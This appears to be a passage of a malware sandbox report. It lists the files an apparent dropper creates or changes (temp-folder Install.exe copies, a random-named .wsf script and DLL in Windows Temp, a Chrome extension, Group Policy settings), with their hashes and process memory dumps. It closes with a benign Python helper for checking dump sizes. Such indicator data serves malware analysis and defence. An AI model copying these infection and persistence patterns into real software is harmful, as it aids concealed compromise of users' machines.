                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                              SHA1

                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                              SHA256

                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                              SHA512

                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                              Filesize

                                                                                                              136B

                                                                                                              MD5

                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                              SHA1

                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                              SHA256

                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                              SHA512

                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                              Filesize

                                                                                                              150B

                                                                                                              MD5

                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                              SHA1

                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                              SHA256

                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                              SHA512

                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                              Filesize

                                                                                                              10KB

                                                                                                              MD5

                                                                                                              6263492cad31587eeaebe54841a913de

                                                                                                              SHA1

                                                                                                              c0a0d95fda568a7e87f520654a6e4f673977a659

                                                                                                              SHA256

                                                                                                              484df10437e1288fe4ed95c1458b2520f73227a541e7694b07049d7ea0adf4dc

                                                                                                              SHA512

                                                                                                              f091e9ba9ee052567476341d4ec94d74cf4cd15d5663312f8fd92a22b371c81e0b73d51ebfbe682c8394b22f35242c2961bb41fc51bbbee3426e5ea2ab2c2fee

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              bda73eecb76840daa19eca61711a1c37

                                                                                                              SHA1

                                                                                                              66698dde4c0976da38898bdfdd20c2e016428a7c

                                                                                                              SHA256

                                                                                                              ebc0f7a1d36ee402647fe7d120eae2f4e94fc1bc9f34e82b725b3cf66b4c7d67

                                                                                                              SHA512

                                                                                                              bf9215b47fd38fd33a397be8b7611c5b5690cc27d0a2f6d0b2c5ef359f4565a1255e510390dc1e67e3591e246a93b36a7800937e692b2604415c303592702b79

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              0a567b8bc8378e2a5dd6826b76a4d6f2

                                                                                                              SHA1

                                                                                                              b42c32e919e27d08a9938ba9e2f3dd1a54ffee7e

                                                                                                              SHA256

                                                                                                              710f43401f05cceb56c8e634c6a517e6d710cb8d76eea3382ce6ce1f3c30fbd8

                                                                                                              SHA512

                                                                                                              86e3ee33bc40ecfab36fec49305e5c473ec1b6ad91bc9ddf145f5207860cfc7bbedc0bc0113e2f187809a9b4bf359af935269932e24fa1848f0acea19ca9fc2d

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              3857a9ee970ee59e1dd9aa5993b2acab

                                                                                                              SHA1

                                                                                                              74ac17d38a75eff4b318822cca3ce293fe48e21a

                                                                                                              SHA256

                                                                                                              0413cde3bfca7a186dd6db0a26a3bfc158d583dd26ecfbebb45a8fde30519f85

                                                                                                              SHA512

                                                                                                              716ca6ffe580ecf08ecce8cd52a88046b62426a0cfecc3ff1bcfc7279547a9f1d11af7b431ce268b08b215da1b7ee4ed4c3fddc8d6458355ec2541b4b906baec

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              5b2812a8def01bd36355568e3b58d8fb

                                                                                                              SHA1

                                                                                                              9fbd359a46014c36a97184fc89ee3b6137222afb

                                                                                                              SHA256

                                                                                                              2aa04fd9a7b6120bd225557cf6d140d69d2a2482df62a4b894d7080552453734

                                                                                                              SHA512

                                                                                                              deabf5082da0173a5391e6deb8ec0e91a3636a2c7660306cca2d7026f6fc6b9199950fe14d6f3308fd77fe29cf46cb0dba4b2f664f9cf04016b994e6716ca038

                                                                                                            • C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf

                                                                                                              Filesize

                                                                                                              9KB

                                                                                                              MD5

                                                                                                              324f0455234fecd0e180f82174522dc4

                                                                                                              SHA1

                                                                                                              845e4b74bdffd042b5fb975d64bb21c731009d3a

                                                                                                              SHA256

                                                                                                              157adfff9722ed4036505039889f7645a0a3e9f410d0a8469a57a22b12a7bc34

                                                                                                              SHA512

                                                                                                              f3a5ecc3063b76eb3c9214cbc7bae1ac5c39fe20cdd451be5ecf8d757ea59a4bc9872601aa4c2adc71416ea8c16f836d7ee80d10d3b3c55caac2c5025c7dbd79

                                                                                                            • C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll

                                                                                                              Filesize

                                                                                                              6.5MB

                                                                                                              MD5

                                                                                                              cfe428169166545941ae665ac1d2578c

                                                                                                              SHA1

                                                                                                              8820ba8de5ce6658c6968f40117b5e8a3a1f4eab

                                                                                                              SHA256

                                                                                                              fd819cf2f5db063ba817d32d14ca2e5d75364807cc9ba53248dfc1578b90dc53

                                                                                                              SHA512

                                                                                                              49442efba4dc52121d6e5f91210a73a9479682cc976b90da333bc601f3789e12588cfd3933eafe7ce260ef93b2d8eade6f31b0d65c5ca0728e8df961e8a36d96

                                                                                                            • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              c559b9e00b20d6f92cc813d899a4e100

                                                                                                              SHA1

                                                                                                              4803773dcbcf83fcc99830267b4149369909491e

                                                                                                              SHA256

                                                                                                              138cf60e1e9329ae6b5fdf3448f33e5c482c72814777ef709bfa902843232745

                                                                                                              SHA512

                                                                                                              3649030e1663627e11dbc56f6073026f2438d9047db218eee2de8ab012a020491324250056cf81c9da85668ddb7efbd2bf5a36790932dfdfb7c1ed38e28c6471

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.4MB

                                                                                                              MD5

                                                                                                              aaef9b8c0610b8465e21846d327686bb

                                                                                                              SHA1

                                                                                                              82ec975f472399b0d82e60df0312b866e0f91709

                                                                                                              SHA256

                                                                                                              dc7b0a8e34ab5558f0fb0a52a92261556110d1ce094f34be8fcbe408535fc379

                                                                                                              SHA512

                                                                                                              4f33cd8fc62e109d3a598a4630ffc2603827a3b4b49ae2e7a184585ca7ea83790d9b3f60d46889606c940cf46bfe949d41339bf2d70383dad43c3ce160176119

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.6MB

                                                                                                              MD5

                                                                                                              d121107c5261ab15018ad1e759aa45a5

                                                                                                              SHA1

                                                                                                              c8753c8765f20a1187ffb749f3a5592276e2415f

                                                                                                              SHA256

                                                                                                              30afb4810b65dd25f3883bea4158c3e00d2c666260cdeb880b105f11aab89d61

                                                                                                              SHA512

                                                                                                              c5ec43cc109c57f4c3eec34dfcf2b17f6791415dff8b6e780bceed4c8bd6cd90ac962b4beb712d489bb7ab78c7b4537623594f56d2cbc6becc020d7d38dfd41b

                                                                                                            • memory/612-319-0x0000000002C30000-0x0000000002CBC000-memory.dmp

                                                                                                              Filesize

                                                                                                              560KB

                                                                                                            • memory/612-329-0x0000000002A10000-0x0000000002AE3000-memory.dmp

                                                                                                              Filesize

                                                                                                              844KB

                                                                                                            • memory/612-87-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-89-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/612-101-0x0000000002200000-0x0000000002285000-memory.dmp

                                                                                                              Filesize

                                                                                                              532KB

                                                                                                            • memory/612-364-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-135-0x00000000002E0000-0x0000000000987000-memory.dmp

  Filesize: 6.7MB

• memory/612-136-0x00000000025E0000-0x0000000002648000-memory.dmp
  Filesize: 416KB

• memory/2068-44-0x0000000000D00000-0x00000000013A7000-memory.dmp
  Filesize: 6.7MB

• memory/2068-46-0x0000000010000000-0x00000000105E3000-memory.dmp
  Filesize: 5.9MB

• memory/2068-88-0x0000000000D00000-0x00000000013A7000-memory.dmp
  Filesize: 6.7MB

• memory/2068-58-0x0000000000D00000-0x00000000013A7000-memory.dmp
  Filesize: 6.7MB

• memory/2116-39-0x0000000001130000-0x00000000017D7000-memory.dmp
  Filesize: 6.7MB

• memory/2116-29-0x0000000010000000-0x00000000105E3000-memory.dmp
  Filesize: 5.9MB

• memory/2116-23-0x0000000001130000-0x00000000017D7000-memory.dmp
  Filesize: 6.7MB

• memory/2116-24-0x00000000009B0000-0x0000000001057000-memory.dmp
  Filesize: 6.7MB

• memory/2116-25-0x00000000009B0000-0x0000000001057000-memory.dmp
  Filesize: 6.7MB

• memory/2116-26-0x00000000009B0000-0x0000000001057000-memory.dmp
  Filesize: 6.7MB

• memory/2276-68-0x000000001B590000-0x000000001B872000-memory.dmp
  Filesize: 2.9MB

• memory/2276-69-0x00000000027A0000-0x00000000027A8000-memory.dmp
  Filesize: 32KB

• memory/2312-18-0x00000000024A0000-0x0000000002B47000-memory.dmp
  Filesize: 6.7MB

• memory/2396-57-0x0000000002040000-0x0000000002048000-memory.dmp
  Filesize: 32KB

• memory/2396-56-0x000000001B750000-0x000000001BA32000-memory.dmp
  Filesize: 2.9MB

• memory/2704-352-0x0000000001310000-0x00000000018F3000-memory.dmp
  Filesize: 5.9MB
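The dump names above encode the process id, a dump index and the mapped address range, so each Filesize label can be recomputed from the name and the same-sized mapping can be tracked across processes. The following Python is an added example, not part of this report or of tria.ge's tooling: the `memory/<pid>-<n>-<start>-<end>-memory.dmp` pattern is inferred from the entries listed here, the sample entries are a constructed subset of that list, and the label rounding is an assumed reproduction of the report's convention rather than a documented format.

```python
"""Parse tria.ge-style memory dump names and cross-check their Filesize labels.

Added example; not part of the sandbox report or of tria.ge. The naming
pattern memory/<pid>-<n>-<start>-<end>-memory.dmp is inferred from the
entries on the page, and size_label() is an assumed reproduction of the
report's rounding, not a documented convention.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the dump entries listed above, each paired
# with the Filesize label the report shows for it.
SAMPLE_ENTRIES = [
    ("memory/612-136-0x00000000025E0000-0x0000000002648000-memory.dmp", "416KB"),
    ("memory/2068-44-0x0000000000D00000-0x00000000013A7000-memory.dmp", "6.7MB"),
    ("memory/2068-46-0x0000000010000000-0x00000000105E3000-memory.dmp", "5.9MB"),
    ("memory/2116-39-0x0000000001130000-0x00000000017D7000-memory.dmp", "6.7MB"),
    ("memory/2116-29-0x0000000010000000-0x00000000105E3000-memory.dmp", "5.9MB"),
    ("memory/2116-24-0x00000000009B0000-0x0000000001057000-memory.dmp", "6.7MB"),
    ("memory/2276-68-0x000000001B590000-0x000000001B872000-memory.dmp", "2.9MB"),
    ("memory/2276-69-0x00000000027A0000-0x00000000027A8000-memory.dmp", "32KB"),
    ("memory/2312-18-0x00000000024A0000-0x0000000002B47000-memory.dmp", "6.7MB"),
    ("memory/2704-352-0x0000000001310000-0x00000000018F3000-memory.dmp", "5.9MB"),
]

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-"
    r"(?P<start>0x[0-9A-Fa-f]+)-(?P<end>0x[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_dump_name(name):
    """Return (pid, idx, start, end, size_bytes) for one dump name, or None."""
    m = DUMP_RE.match(name)
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        return None  # malformed or empty range
    return int(m["pid"]), int(m["idx"]), start, end, end - start


def size_label(nbytes):
    """Render a byte count the way the report labels Filesize (assumed:
    whole KiB below 1 MiB, otherwise MiB with one decimal)."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes / 1024:.0f}KB"


def check_entries(entries):
    """Cross-check each listed Filesize against its address range.
    Returns a list of (name, reason) for entries that do not line up."""
    bad = []
    for name, label in entries:
        parsed = parse_dump_name(name)
        if parsed is None:
            bad.append((name, "unparseable"))
            continue
        computed = size_label(parsed[4])
        if computed != label:
            bad.append((name, f"range says {computed}, report says {label}"))
    return bad


def regions_by_size(entries):
    """Group (pid, base) pairs by exact region size, keeping only sizes seen
    more than once, so a mapping that recurs across processes (often at a
    different base in each) stands out for closer inspection."""
    groups = defaultdict(set)
    for name, _ in entries:
        parsed = parse_dump_name(name)
        if parsed:
            pid, _, start, _, size = parsed
            groups[size].add((pid, start))
    return {size: sorted(where) for size, where in groups.items() if len(where) > 1}


if __name__ == "__main__":
    print("mismatches:", check_entries(SAMPLE_ENTRIES))
    for size, where in sorted(regions_by_size(SAMPLE_ENTRIES).items(), reverse=True):
        print(f"{size_label(size):>6} region in: "
              + ", ".join(f"pid {p} @ {hex(b)}" for p, b in where))
```

On the entries above, every label matches its range, and the grouping shows the 0x6A7000-byte (6.7MB) region mapped in 2068, 2116 (at two bases) and 2312, and the 0x5E3000-byte (5.9MB) region at 0x10000000 in both 2068 and 2116 and at 0x1310000 in 2704. 0x10000000 is the default image base for a DLL that has not been rebased, so those two dumps are the ones to pull first when looking for the unpacked module.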